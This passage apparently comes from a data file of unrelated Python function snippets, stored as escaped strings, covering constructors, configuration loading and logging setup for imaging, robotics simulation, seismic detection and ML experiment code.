self.location = kwargs.get(\"location\")\n self.category = kwargs.get(\"category\")\n self.source = kwargs.get(\"source\")\n self.heading = kwargs.get(\"heading\")\n self.body = kwargs.get(\"body\")\n self.latitude = kwargs.get(\"latitude\")\n self.longitude = kwargs.get(\"longitude\")\n self.language = kwargs.get(\"language\")\n self.price = kwargs.get(\"price\")\n self.currency = kwargs.get(\"currency\")\n self.images = kwargs.get(\"images\", [])\n self.externalID = kwargs.get(\"externalID\")\n self.externalURL = kwargs.get(\"externalURL\")\n self.accountName = kwargs.get(\"accountName\")\n self.accountID = kwargs.get(\"accountID\")\n self.timestamp = kwargs.get(\"timestamp\")\n self.expiration = kwargs.get(\"expiration\")\n self.annotations = kwargs.get(\"annotations\", {})\n self.trustedAnnotations = kwargs.get(\"trustedAnnotations\", {})\n self.clickCount = kwargs.get(\"clickCount\")", "def config(\n data_folder=settings.data_folder,\n logs_folder=settings.logs_folder,\n imgs_folder=settings.imgs_folder,\n cache_folder=settings.cache_folder,\n cache_responses=settings.cache_responses,\n log_file=settings.log_file,\n log_console=settings.log_console,\n log_level=settings.log_level,\n log_name=settings.log_name,\n log_filename=settings.log_filename,\n useful_idf_objects=settings.useful_idf_objects,\n default_weight_factor=\"area\",\n ep_version=settings.ep_version,\n debug=settings.debug,\n):\n # set each global variable to the passed-in parameter value\n settings.cache_responses = cache_responses\n settings.cache_folder = Path(cache_folder).expand().makedirs_p()\n settings.data_folder = Path(data_folder).expand().makedirs_p()\n settings.imgs_folder = Path(imgs_folder).expand().makedirs_p()\n settings.logs_folder = Path(logs_folder).expand().makedirs_p()\n settings.log_console = log_console\n settings.log_file = log_file\n settings.log_level = log_level\n settings.log_name = log_name\n settings.log_filename = log_filename\n settings.useful_idf_objects = useful_idf_objects\n settings.zone_weight.set_weigth_attr(default_weight_factor)\n settings.ep_version = ep_version\n settings.debug = debug\n\n # if logging is turned on, log that we are configured\n if settings.log_file or settings.log_console:\n get_logger(name=\"archetypal\")\n log(\"Configured archetypal\")", "def log_setup():\n logger = logging.getLogger('diskover')\n logger_warn = logging.getLogger('diskover_warn')\n eslogger = logging.getLogger('elasticsearch')\n diskover_eslogger = logging.getLogger('diskover_elasticsearch')\n loglevel = config['logLevel'].get()\n if options.debug:\n loglevel = 'DEBUG'\n if loglevel == 'DEBUG':\n loglevel = logging.DEBUG\n elif loglevel == 'INFO':\n loglevel = logging.INFO\n else:\n loglevel = logging.WARN\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n if logtofile:\n # create log file name using top dir names and datestamp\n treedirsstr = ''\n if args:\n n = 1\n dirs = args[0:]\n x = len(dirs)\n for d in dirs:\n if d != '/':\n d = d.rstrip('/')\n treedirsstr += os.path.basename(d)\n if n < x:\n treedirsstr += '_'\n n += 1\n else:\n treedirsstr = os.path.basename(os.getcwd())\n logfiletime = datetime.now().isoformat()\n logname = 'diskover_' + treedirsstr + '_' + logfiletime + '.log'\n logfile = os.path.join(logdir, logname)\n handler_file = logging.FileHandler(logfile)\n handler_file.setFormatter(logging.Formatter(logformat))\n logger.setLevel(loglevel)\n logger.addHandler(handler_file)\n # console logging\n handler_con = logging.StreamHandler()\n 
handler_con.setFormatter(logging.Formatter(logformat))\n logger.addHandler(handler_con)\n # warnings log\n logname_warn = 'diskover_' + treedirsstr + '_' + logfiletime + '_warnings.log'\n logfile_warn = os.path.join(logdir, logname_warn)\n handler_warnfile = logging.FileHandler(logfile_warn)\n handler_warnfile.setFormatter(logging.Formatter(logformat))\n logger_warn.setLevel(logging.WARN)\n logger_warn.addHandler(handler_warnfile)\n # es logger\n eslogger.setLevel(logging.WARN)\n eslogger.addHandler(handler_file)\n eslogger.addHandler(handler_con)\n # diskover es logger\n diskover_eslogger.setLevel(loglevel)\n diskover_eslogger.addHandler(handler_file)\n diskover_eslogger.addHandler(handler_con)\n else:\n handler_file = None\n handler_warnfile = None\n handler_con = None\n logging.basicConfig(format=logformat, level=loglevel)\n eslogger.setLevel(logging.WARN)\n return logger, logger_warn, loglevel, logformat, \\\n handler_file, handler_warnfile, handler_con", "def __init__(self, xyz_coord, radius, brightness):\n verify_xyz_coord_type(xyz_coord)\n verify_radius_value(radius)\n verify_brightness_value(brightness)\n\n self.xyz_coord = list(xyz_coord)\n self.radius = radius\n self.brightness = brightness\n\n self.pulse_data = {XYZ_COORD_LABEL: self.xyz_coord,\n RADIUS_LABEL: self.radius,\n BRIGHTNESS_LABEL: self.brightness}", "def __init__(self):\n\n super().__init__()\n\n self.active = True\n self.driver = Driver.instance()\n self.camera = Camera.instance()\n\n # define directories and file paths\n date_str = datetime.today().strftime(\"%Y-%m-%d-%H-%M-%S\")\n self.log_dir = f\"{const.Storage.DATA}/{date_str}\"\n self.img_dir = f\"{self.log_dir}/img/\"\n self.log_path = f\"{self.log_dir}/log.csv\"\n self.img_extension = \"npy\"\n\n # ensure that the necessary directories exist\n os.mkdir(self.log_dir)\n os.mkdir(self.img_dir)\n assert os.path.isdir(self.log_dir), \"data directory could not be created\"\n assert os.path.isdir(self.img_dir), \"image directory could not be created\"", "def __init__(self, config, logger=None, verbose=2):\n self.logger = logger\n self.config = config\n self.verbose = verbose\n self.log_command_to_met_log = False", "def __init__(self, savePath, configSlice=slice(None, None, None)):\n super().__init__(savePath, configSlice)\n ## `dict` of log weights (`str` -> `list`)\n self.logWeights = {}", "def __init__(self, camID, camera_cal_file='camera_cal_bnl.yaml'):\n self.camID=camID\n with open(camera_cal_file,\"r\") as yfile:\n params=yaml.load(yfile)\n # exit gracefully if yfile doesn't open\n self.nx0=params[camID]['nx0']\n self.ny0=self.nx0\n # pr0 is nx0/2, i.e. 
probably initial radius estimate.\n # pr0 rather than nx0 should be in the camera_cal_SSS.yaml config file\n self.pr0=(self.nx0+self.ny0)/4.\n self.ndy0=params[camID]['ndy0']\n self.ndx0=params[camID]['ndx0']\n self.cx=params[camID]['cx']\n self.cy=params[camID]['cy']\n self.rot=params[camID]['rot']\n self.beta=params[camID]['beta']\n self.azm=params[camID]['azm']\n self.c1=params[camID]['c1']\n self.c2=params[camID]['c2']\n self.c3=params[camID]['c3']\n self.lat=params[camID]['lat']\n self.lon=params[camID]['lon']\n# may need to resurrect this\n# xstart=int(params[camID]['cy']-nx0/2+0.5); ystart=int(params[camID]['cx']-ny0/2+0.5)\n self.nx0=int(self.nx0+0.5)\n self.ny0=int(self.ny0+0.5)", "def configure(self):\n self.data_batch_file = self.get_value_from_config('data_batch_file')\n self.batch_meta_file = self.get_value_from_config('batch_meta_file')\n self.has_background = self.get_value_from_config('has_background')\n self.num_classes = self.get_value_from_config('num_classes')\n self.converted_images_dir = self.get_value_from_config('converted_images_dir')\n if not self.converted_images_dir:\n self.converted_images_dir = self.data_batch_file.parent / 'converted_images'\n self.convert_images = self.get_value_from_config('convert_images')\n # create directory for storing images if it is necessary\n if self.convert_images and not self.converted_images_dir.exists():\n self.converted_images_dir.mkdir(parents=True)\n self.dataset_meta = self.get_value_from_config('dataset_meta_file')", "def create_annotation_data(self):\n for i, hp in enumerate(self.hanging_point_in_camera_coords_list):\n px, py = self.camera_model.project3d_to_pixel(hp.worldpos())\n if self.save_debug_image:\n self.bgr_axis = self.bgr.copy()\n if 0 <= px < self.target_width and 0 <= py < self.target_height:\n if self.save_debug_image:\n draw_axis(self.bgr_axis,\n hp.worldrot(),\n hp.worldpos(),\n self.camera_model.K)\n create_gradient_circle(\n self.annotation_img,\n int(py), int(px))\n if self.visible_labels == []:\n self.annotation_data.append(\n {'xy': [int(px), int(py)],\n 'depth': hp.worldpos()[2] * 1000,\n 'quaternion': hp.quaternion.tolist()}\n )\n else:\n self.annotation_data.append(\n {'xy': [int(px), int(py)],\n 'depth': hp.worldpos()[2] * 1000,\n 'quaternion': hp.quaternion.tolist(),\n 'label': self.visible_labels[i]}\n )\n self.rotation_map.add_quaternion(\n int(px), int(py), hp.quaternion)\n\n # self.depth_map.add_depth(\n # int(px), int(py),\n # hp.worldpos()[2] * 1000)\n\n if np.all(self.annotation_img == 0):\n print('out of camera')\n return False\n\n self.annotation_img \\\n = self.annotation_img / self.annotation_img.max() * 255\n self.annotation_img = self.annotation_img.astype(np.uint8)\n\n self.rotations = self.rotation_map.rotations\n\n # self.hanging_points_depth = self.depth_map.on_depth_image(self.depth)\n\n return True", "def pre_process_information(self):\n self.logger.debug(\n colorama.Fore.BLUE\n + \"jsnapy.cfg file location used : %s\" % get_config_location(),\n extra=self.log_detail,\n )\n self.logger.debug(\n colorama.Fore.BLUE\n + \"Configuration file location used : %s\"\n % get_path(\"DEFAULT\", \"config_file_path\"),\n extra=self.log_detail,\n )", "def __init__(self, log_path):\n # create a map for storing LogImg objects\n self.log_img_map = OrderedDict()\n\n # set the path to the log directory\n self.log_path = log_path\n\n # check if log directory already exists or create it\n if not os.path.exists(self.log_path):\n os.makedirs(self.log_path)\n\n # set current training step\n 
self.train_step = 0", "def __init__(self, dat, frame, box_size, centre,\n arrow_width=_arrow_width,\n arrow_head_width=_arrow_head_width,\n arrow_head_length=_arrow_head_length,\n pad=_colormap_label_pad, dt=1,jump=1,\n label=False, **kwargs):\n\n super().__init__(dat, frame, box_size, centre,\n arrow_width=arrow_width,\n arrow_head_width=arrow_head_width,\n arrow_head_length=arrow_head_length) # initialise superclass\n\n self.displacements = (\n dat.getDisplacements(frame, frame + dt, *self.particles, jump=jump)) # particles' displacements at frame\n\n self.vmin, self.vmax = amplogwidth(self.displacements)\n try:\n self.vmin = np.log10(kwargs['vmin'])\n except (KeyError, AttributeError): pass # 'vmin' not in keyword arguments or None\n try:\n self.vmax = np.log10(kwargs['vmax'])\n except (KeyError, AttributeError): pass # 'vmax' not in keyword arguments or None\n\n self.colorbar(self.vmin, self.vmax) # add colorbar to figure\n self.colormap.set_label( # colorbar legend\n r'$\\log_{10}||\\vec{r}_i(t + \\Delta t) - \\vec{r}_i(t)||$',\n labelpad=pad, rotation=270)\n\n self.label = label # write labels\n\n self.draw()", "def log_builder(self, log_level, hrtimestamp, datestamp, timestamp, log_msg, tags):\n log_body = {}\n log_body[\"filename\"] = self.filename\n log_body[\"log_level\"] = log_level\n log_body[\"hrtimestamp\"] = hrtimestamp\n log_body[\"datestamp\"] = datestamp\n log_body[\"timestamp\"] = timestamp\n log_body[\"log_msg\"] = log_msg\n log_body[\"tags\"] = tags\n return log_body", "def __init__(self, key=None, log_dir=None, log_thresh=1):\n self.key = key\n self.log_dir = log_dir\n self.log_thresh = log_thresh\n self.last_h = None\n self.last_a = None\n self.last_x0 = None\n self.last_y0 = None\n self.last_sx = None\n self.last_sy = None\n self.last_theta = None\n self.last_cutoff = None\n\n if self.log_dir:\n if not os.path.isdir(self.log_dir):\n raise ValueError(self.log_dir + \" is not a directory\")", "def __init__(self, **kwargs):\n super(MBTilesBuilder, self).__init__(**kwargs)\n self.filepath = kwargs.get('filepath', DEFAULT_FILEPATH)\n # Gather tiles for mbutil\n basename, ext = os.path.splitext(os.path.basename(self.filepath))\n self.tmp_dir = kwargs.get('tmp_dir', DEFAULT_TMP_DIR)\n self.tmp_dir = os.path.join(self.tmp_dir, basename)\n # Number of tiles in total\n self.nbtiles = 0\n self._bboxes = []", "def __init__(\n self, im_width=512,\n im_height=424, fov=42.5,\n near_plane=0.1, far_plane=30.0,\n target_width=256, target_height=256,\n use_change_light=True, labels=None,\n save_dir='./', save_debug_image=False,\n gui=False, task_type='hanging', stop_per_data=False,\n random_texture_path=None):\n self.objects = []\n self.im_width = im_width\n self.im_height = im_height\n self.fov = fov\n self.near_plane = near_plane\n self.far_plane = far_plane\n self.target_width = target_width\n self.target_height = target_height\n self.save_dir = save_dir\n self.save_debug_image = save_debug_image\n self.task_type = task_type\n self.stop_per_data = stop_per_data\n\n if self.task_type == 'hanging':\n # direction of grabity\n self.translate_value = np.array([0, 0.005, 0])\n elif self.task_type == 'pouring':\n # direction opposite to gravity\n self.translate_value = np.array([-0.005, 0, 0])\n\n aspect = self.im_width / self.im_height\n self.camera_model \\\n = cameramodels.PinholeCameraModel.from_fov(\n fov, im_height, im_width)\n\n self.camera_model.target_size = (target_width, target_height)\n self.pm = pybullet.computeProjectionMatrixFOV(\n fov, aspect, near_plane, far_plane)\n\n 
self.camera_coords = coordinates.Coordinates(\n pos=np.array([0, 0, 0.5]),\n rot=coordinates.math.rotation_matrix_from_rpy([0, np.pi, 0]))\n\n self.annotation_img = np.zeros(\n (target_width, target_height), dtype=np.uint32)\n\n self.annotation_data = []\n self.rotation_map = RotationMap(target_width, target_height)\n self.rotations = None\n self.depth_map = DepthMap(target_width, target_height, circular=True)\n\n self.object_coords = coordinates.Coordinates(\n pos=np.array([0, 0, 0.1]),\n rot=coordinates.math.rotation_matrix_from_rpy([0, 0, 0]))\n\n self.labels = labels\n self.visible_labels = []\n\n if gui:\n self.cid = pybullet.connect(pybullet.GUI)\n pybullet.resetDebugVisualizerCamera(\n cameraDistance=1,\n cameraYaw=90,\n cameraPitch=0,\n cameraTargetPosition=[0, 0, 0.1])\n else:\n self.cid = pybullet.connect(pybullet.DIRECT)\n self.gui = gui\n self.no_visible_count = 0\n self.no_visible_skip_num = 300\n\n self.texture_paths = list(\n map(str, list(Path(random_texture_path).glob('**/*.jpg'))))\n current_dir = osp.dirname(osp.abspath(__file__))\n self.gray_texture = osp.join(current_dir, 'images', 'gray.jpg')\n\n pybullet.setAdditionalSearchPath(pybullet_data.getDataPath())\n pybullet.setPhysicsEngineParameter(enableFileCaching=0)\n\n self.draw_camera_pos()\n self.lightDirection = [1, 1, 1]\n self.lightDistance = 1\n self.lightColor = [1, 1, 1]\n self.lightAmbientCoeff = 0.2\n self.lightDiffuseCoeff = 0.9\n self.lightSpecularCoeff = 0.9\n if use_change_light:\n self.change_light()\n self._rendered = None\n self._rendered_pos = None\n self._rendered_rot = None", "def __init__(self, level, pathname, lineno, msg, args, exc_info, func=None):\n #\n # The following statement allows passing of a dictionary as a sole\n # argument, so that you can do something like\n # logging.debug(\"a %(a)d b %(b)s\", {'a':1, 'b':2})\n # Suggested by Stefan Behnel.\n # Note that without the test for args[0], we get a problem because\n # during formatting, we test to see if the arg is present using\n # 'if self.args:'. If the event being logged is e.g. 'Value is %d'\n # and if the passed arg fails 'if self.args:' then no formatting\n # is done. 
For example, logger.warn('Value is %d', 0) would log\n # 'Value is %d' instead of 'Value is 0'.\n # For the use case of passing a dictionary, this should not be a problem.\n if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:\n args = args[0]\n self.args = args\n self.levelno = level\n self.pathname = pathname\n self.msg = msg\n\n self.levelname = \"FOOBAR\" #getLevelName(level)\n\n try:\n self.filename = os.path.basename(pathname)\n self.module = os.path.splitext(self.filename)[0]\n except (TypeError, ValueError, AttributeError):\n self.filename = pathname\n self.module = \"Unknown module\"\n\n self.exc_info = exc_info\n self.exc_text = None # used to cache the traceback text\n self.lineno = lineno\n self.func_name = func\n self.created = time.time()\n self.asctime = time.asctime()\n # Remove milliseconds\n i = self.asctime.find(\".\")\n if i != -1: self.asctime = self.asctime[:i]", "def __init__(self):\n if not os.path.isfile(CONFIG_FILENAME):\n first_time_run()\n raise SystemExit()\n\n \"\"\"\n Init file is present, read and parse it:\n \"\"\"\n conf = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation(), inline_comment_prefixes='#')\n conf.read(CONFIG_FILENAME)\n \"\"\"\n Process certain paths:\n \"\"\"\n\n path = conf['Paths']\n self.ffc_dir = path['FlatFieldCalDir']\n self.capture_dir = path['CaptureDir']\n self.image_dir = path['ImageDir']\n\n \"\"\"\n Process options\n \"\"\"\n\n self.cal_auto_save = conf.getboolean('Options', 'CalAutoSave', fallback=True)\n self.cal_auto_load = conf.getboolean('Options', 'CalAutoLoad', fallback=True)\n self.sound_on_capture = conf.getboolean('Options', 'SoundOnCapture', fallback=True)\n self.exp_init1 = conf.getint('Options', 'ExpInit1', fallback=100)\n self.exp_init2 = conf.getint('Options', 'ExpInit2', fallback=100)\n self.black_correct = conf.getboolean('Options', 'BlackCorrect', fallback=True)\n # Setup square window, default of full-screen height\n self.tiff_seq_x_window = conf.getint('Options', 'TiffSeqXWindow', fallback=cameras.FRAME_HEIGHT)\n self.tiff_seq_y_window = conf.getint('Options', 'TiffSeqYWindow', fallback=cameras.FRAME_HEIGHT)\n self.tiff_seq_rebin = conf.getint('Options', 'TiffSeqRebin', fallback = 2)", "def __init__(self, detector):\n self.base_dir = os.path.join(os.getcwd(), cfg.local[\"BASE_DB\"])\n self.images_dir = os.path.join(self.base_dir, cfg.local[\"IMG_DIR\"])\n self.X_filename = os.path.join(self.base_dir, cfg.data[\"X_NAME\"])\n self.y_filename = os.path.join(self.base_dir, cfg.data[\"y_NAME\"])\n self.le_filename = os.path.join(self.base_dir, cfg.models[\"LE_NAME\"])\n self.detector = detector\n\n if not os.path.exists(self.base_dir):\n os.mkdir(self.base_dir)\n\n if not os.path.exists(self.images_dir):\n os.mkdir(self.images_dir)\n\n #Load basic information here\n self.__initDataFromImages() #Init before load\n self.__loadPreProcessedData()", "def setup(args):\n cfg = get_cfg()\n\n cfg.merge_from_file(model_zoo.get_config_file(args.model_zoo))\n cfg.DATASETS.TRAIN = (args.train_dataset, )\n cfg.DATASETS.TEST = (args.test_dataset, )\n cfg.DATALOADER.NUM_WORKERS = args.num_workers\n cfg.OUTPUT_DIR = args.output_dir\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n\n cfg.image_w = args.size[0]\n cfg.image_h = args.size[1]\n\n cfg.MODEL.WEIGHTS = args.model_zoo_weights\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.roi_thresh # set a custom testing threshold\n\n default_setup(cfg, args)\n return cfg", "def __init__(self, args):\n self.cropped_dir = args.cropped_dir\n 
self.output_dir = args.output_dir\n self.txt_info_dir = args.txt_info_dir\n\n self.HR_dim = []\n self.HR_dim.append(int(args.HR_dim.split(' ')[0]))\n self.HR_dim.append(int(args.HR_dim.split(' ')[1]))\n self.HR_dim.append(int(args.HR_dim.split(' ')[2]))\n\n self.HR_pixdim = []\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[0]))\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[1]))\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[2]))", "def _generate_setup(self,num_pores,domain_size):\n logger.debug(\"generate_setup: Perform preliminary calculations\")\n if domain_size is not None and num_pores is not None:\n self._Lx = domain_size[0]\n self._Ly = domain_size[1]\n self._Lz = domain_size[2]\n self._Np = num_pores\n r\"\"\"\n TODO: Fix this, btype should be received as an argument\n \"\"\"\n self._btype = [0,0,0]\n else:\n logger.error(\"domain_size and num_pores must be specified\")\n raise Exception('domain_size and num_pores must be specified')", "def __init__(self, level, general_log_path, outputs_folder):\n self.log_level = level\n\n # self.general_log_file = general_log_path.open('w')\n self.general_log_file = GCOpen(general_log_path, 'w')\n self.general_log_file.open()\n\n self.file_outputs_dir = outputs_folder / 'output_files'\n # self.file_outputs_dir.mkdir(exist_ok=True)\n\n exp_name = str(outputs_folder).split('/')[-1]\n\n self.summary_writer = SummaryWriter(log_dir=str(TEMP_FOLDER),\n filename_suffix='.' + exp_name)\n tf_filename = find_tf_event(exp_name)\n self.sw_local_path = Path(TEMP_FOLDER) / tf_filename\n self.sw_gc_path = outputs_folder / tf_filename\n\n self.log(\"Starting new experiment at \" +\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self.log(\"User: \" + getpass.getuser())\n self.log(\"Host: \" + socket.gethostname())\n\n Logger.unique_logger = self", "def __init__(self):\n parameters_list = []\n self.config_dict = self.open_config(parameters_list)\n\n # Define defaults\n self.disc_gt = 0.0\n self.disc_out = 0.0", "def __init__(self, basePath, darkframePath=None, flip_image_across_axis=None, show_image=False, save_image=False, save_img_type='.tif',\n savePath=None, savename=None, save_plot=False):\n self.basePath = basePath\n\n img, mean, std = calculate_darkfield(self.basePath, darkframePath=darkframePath, flip_image_axes=flip_image_across_axis, show_image=show_image, save_image=save_image, save_img_type=save_img_type,\n savePath=savePath, savename=savename, save_plot=save_plot)\n\n self.img = img\n self.mean = mean\n self.std = std", "def __init__(self, config):\n\n self.root = config.root\n self.pidfile = config.pidfile\n self.log_conf = config.logging", "def __init__(self,\n config_file=None,\n input_path=None,\n output_format=None,\n input_format=None,\n context='',\n ):\n\n absolute_path = path.join(context, config_file)\n import_dir_path = path.dirname(absolute_path)\n import_filename = path.basename(absolute_path)\n\n root_configs = {\n 'imports': [\n import_filename\n ],\n 'parameters': {\n 'input': {},\n 'output': {}\n },\n }\n\n if input_path is not None:\n root_configs['parameters']['input']['path'] = input_path\n\n if input_format is not None:\n root_configs['parameters']['input']['format'] = input_format\n\n if output_format is not None:\n root_configs['parameters']['output']['format'] = output_format\n\n self.configs = Config(import_dir_path, configs=root_configs)\n\n try:\n self.input_dir_path = path.join(context, self.params('input', 'path'))\n except Exception as e:\n Logger.debug(e)\n 
Logger.error('inp_path_missing')\n\n try:\n self.configs.get('parameters', 'output', 'path')\n except Exception as e:\n # setting the default output folder\n # this could be generalized and encapsulated as a setter on the config class\n self.configs.configs['parameters']['output']['path'] = 'output'\n self.configs.config_paths['parameters']['output']['path'] = context\n\n reader = self.params('input', 'format')\n if not is_str(reader) and issubclass(reader, Reader):\n self.module_loader.set_reader(reader)\n else:\n try:\n self.module_loader.load_reader(reader)\n Logger.info('input_format_detected', self.params('input', 'format'))\n except KeyError as e:\n Logger.debug(e)\n Logger.error('inp_format_missing')\n except Exception as e:\n Logger.debug(e)\n Logger.error('bad_inp_format', self.params('input', 'format'), str(e))\n\n writer = self.params('output', 'format')\n if not is_str(writer) and issubclass(writer, Writer):\n self.module_loader.set_writer(writer)\n else:\n try:\n self.module_loader.load_writer(writer)\n Logger.info('output_format_detected', self.params('output', 'format'))\n except KeyError as e:\n Logger.debug(e)\n Logger.error('out_format_missing')\n except Exception as e:\n Logger.debug(e)\n Logger.error('bad_out_format', self.params('output', 'format'), str(e))", "def __init__(self, **kwargs):\n super(ImageExporter, self).__init__(**kwargs)", "def init_all_params(self):\n self.annotations_timestamp = 0\n # self.annotations_offset = 0\n # self.annotation_offset_text.configure(text='Current: %d' % self.annotations_offset)\n self.annotations_timestamp_text.configure(text='Annotation timestamp:\\n %d' % self.annotations_timestamp)\n self.annotations_timestamp_text.grid(sticky=\"W\", row=9, column=0, columnspan=10)\n # set text frames\n # self.annotations_offset_entry.delete(0, 'end')\n # self.annotations_offset_entry.insert(0, str(self.annotations_offset))\n self.current_frame_entry.delete(0, 'end')\n self.current_frame_entry.insert(0, str(self.vid.frame_number))", "def __init__(self, run_config):\n print('Initializing logs...')\n log_root = run_config['log_root_path']\n self._save_iter = run_config['save_iter']\n self._best_epoch = False\n if run_config['resume_path']:\n # resume an old experiment\n self.log_dir = run_config['resume_path']\n if os.path.exists(os.path.join(log_root, self.log_dir)):\n self.log_path = os.path.join(log_root, self.log_dir)\n print(' Resuming experiment ' + self.log_dir)\n else:\n raise Exception('Experiment folder ' + self.log_dir + ' not found.')\n else:\n # start a new experiment\n if 'log_dir' not in run_config:\n self.log_dir = ''\n else:\n self.log_dir = run_config['log_dir']\n self.log_dir += strftime(\"%b_%d_%Y_%H_%M_%S\") + '/'\n self.log_path = os.path.join(log_root, self.log_dir)\n os.makedirs(self.log_path)\n os.system(\"rsync -au --include '*/' --include '*.py' --exclude '*' . 
\" + self.log_path + \"source\")\n os.makedirs(os.path.join(self.log_path, 'metrics'))\n os.makedirs(os.path.join(self.log_path, 'checkpoints'))\n self.epoch = 1\n print(' Starting experiment ' + self.log_dir)", "def __init__(self, **kwargs):\n configPath = kwargs.get(\"configPath\", \"exdb-config-example.yml\")\n self.__configName = kwargs.get(\"configName\", \"site_info_remote_configuration\")\n mockTopPath = kwargs.get(\"mockTopPath\", None)\n self.__cfgOb = ConfigUtil(configPath=configPath, defaultSectionName=self.__configName, mockTopPath=mockTopPath)\n self.__workPath = kwargs.get(\"workPath\", HERE)\n self.__cachePath = kwargs.get(\"cachePath\", os.path.join(self.__workPath, \"CACHE\"))\n #\n self.__stashRemotePrefix = kwargs.get(\"stashRemotePrefix\", None)\n #\n self.__debugFlag = kwargs.get(\"debugFlag\", False)\n self.__startTime = time.time()\n if self.__debugFlag:\n logger.setLevel(logging.DEBUG)\n logger.debug(\"Starting at %s\", time.strftime(\"%Y %m %d %H:%M:%S\", time.localtime()))\n #", "def __init__(self, log_dir, schedule):\n \n # Save parameters as internal members\n self.log_dir = log_dir\n self.schedule = schedule\n \n # Create a file writer for TensorBoard logs\n self.file_writer = tf.summary.create_file_writer(log_dir)\n self.file_writer.set_as_default()", "def __init__(self, config, stats):\n self.config = config\n self.stats = stats\n self.on_map = False", "def _setupConfigAnnotation(self):\n annotations = IAnnotations(self)\n settings = annotations.get(\"PLOMINOFIELDCONFIG\", None)\n if not settings:\n annotations[\"PLOMINOFIELDCONFIG\"] = PersistentDict()", "def __init__(self, cfg):\r\n\r\n\t\tself.image_size = cfg.MODEL.INPUT.IMAGE_SIZE\r\n\t\tanchor_config = cfg.MODEL.ANCHORS\r\n\t\tself.feature_maps = anchor_config.FEATURE_MAPS\r\n\t\tself.min_sizes = anchor_config.MIN_SIZES\r\n\t\tself.max_sizes = anchor_config.MAX_SIZES \r\n\t\tself.aspect_ratios = anchor_config.ASPECT_RATIOS\r\n\t\tself.clip = anchor_config.CLIP", "def initialise(self):\n self.logger.debug(\" %s [GenerateNextPose::initialise()]\" % self.name)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def create_base_image(self, builder, template, parameters):", "def __init__(self):\n\n # Filter parameters\n self.p_bp_filter = [2.0, 16.0, 2]\n self.s_bp_filter = [2.0, 12.0, 2]\n\n # Onset window parameters\n self.p_onset_win = [0.2, 1.0]\n self.s_onset_win = [0.2, 1.0]\n\n # Traveltime lookup table decimation factor\n self.decimate = [1, 1, 1]\n\n # Time step for continuous compute in detect\n self.time_step = 120.\n\n # Data sampling rate\n self.sampling_rate = 50\n\n # Centred onset function override -- None means it will be\n # automatically set in detect() and locate()\n self.onset_centred = None\n\n # Pick related parameters\n self.pick_threshold = 1.0\n self.picking_mode = \"Gaussian\"\n self.fraction_tt = 0.1\n\n # Marginal window\n self.marginal_window = 2.\n\n # Default pre-pad for compute\n self.pre_pad = None\n\n # Number of cores to perform detect/locate on\n self.n_cores = 1\n\n # Toggle whether to incrementally write .scanmseed in detect()\n 
self.continuous_scanmseed_write = False\n\n # Plotting toggles\n self.plot_event_summary = True\n self.plot_station_traces = False\n self.plot_coal_video = False\n\n # Saving toggles\n self.write_4d_coal_grid = False\n self.write_cut_waveforms = False\n self.cut_waveform_format = \"MSEED\"\n self.pre_cut = None\n self.post_cut = None\n\n # xy files for plotting\n self.xy_files = None", "def __init__(self, name=\"logger\", loglevel=3, persist=True, flush=True, rotation_interval=1, format=\"text\"):\n\n self.name = name\n self.loglevel = loglevel\n self.persist = persist\n self.flush = flush\n self.format = format\n \n self.rotation_interval = rotation_interval # (int) days\n\n self.initialize()", "def _configure_vision(self, config, level):\n self._register_or_update_all_publishers(config)\n\n # Set max number of balls\n self._max_balls = config['ball_candidate_max_count']\n\n # Set some thresholds\n # Brightness threshold which determines if the camera cap is on the camera.\n self._blind_threshold = config['vision_blind_threshold']\n # Threshold for ball candidates\n self._ball_candidate_threshold = config['ball_candidate_rating_threshold']\n # Maximum offset for balls over the convex field boundary\n self._ball_candidate_y_offset = config['ball_candidate_field_boundary_y_offset']\n # Maximum offset for balls over the convex field boundary\n self._goal_post_field_boundary_y_offset = config['goal_post_field_boundary_y_offset']\n\n # Which line type should we publish?\n self._use_line_points = config['line_detector_use_line_points']\n self._use_line_mask = config['line_detector_use_line_mask']\n\n # Should the debug image be published?\n if ros_utils.config_param_change(self._config, config, 'vision_publish_debug_image'):\n if config['vision_publish_debug_image']:\n rospy.loginfo('Debug images are enabled', logger_name=\"vision\")\n else:\n rospy.loginfo('Debug images are disabled', logger_name=\"vision\")\n # Create debug drawer\n self._debug_image_creator = debug.DebugImage(config['vision_publish_debug_image'])\n '''\n # Should the fcnn output (only under the field boundary) be published?\n if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_output'):\n self._ball_fcnn_publish_output = config['ball_fcnn_publish_output']\n if self._ball_fcnn_publish_output:\n rospy.loginfo('ball FCNN output publishing is enabled', logger_name=\"vision\")\n else:\n rospy.loginfo('ball FCNN output publishing is disabled', logger_name=\"vision\")\n\n # Should the whole fcnn output be published?\n if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_debug_img'):\n self._publish_fcnn_debug_image = config['ball_fcnn_publish_debug_img']\n if self._publish_fcnn_debug_image:\n rospy.loginfo('Ball FCNN debug image publishing is enabled', logger_name=\"vision_fcnn\")\n else:\n rospy.loginfo('Ball FCNN debug image publishing is disabled', logger_name=\"vision_fcnn\")\n '''\n # Should the HSV mask images be published?\n if ros_utils.config_param_change(self._config, config, 'vision_publish_HSV_mask_image'):\n self._publish_HSV_mask_image = config['vision_publish_HSV_mask_image']\n if self._publish_HSV_mask_image:\n rospy.loginfo('HSV mask image publishing is enabled', logger_name=\"vision_hsv_color_detector\")\n else:\n rospy.loginfo('HSV mask image publishing is disabled', logger_name=\"vision_hsv_color_detector\")\n\n # Should the (dynamic color lookup 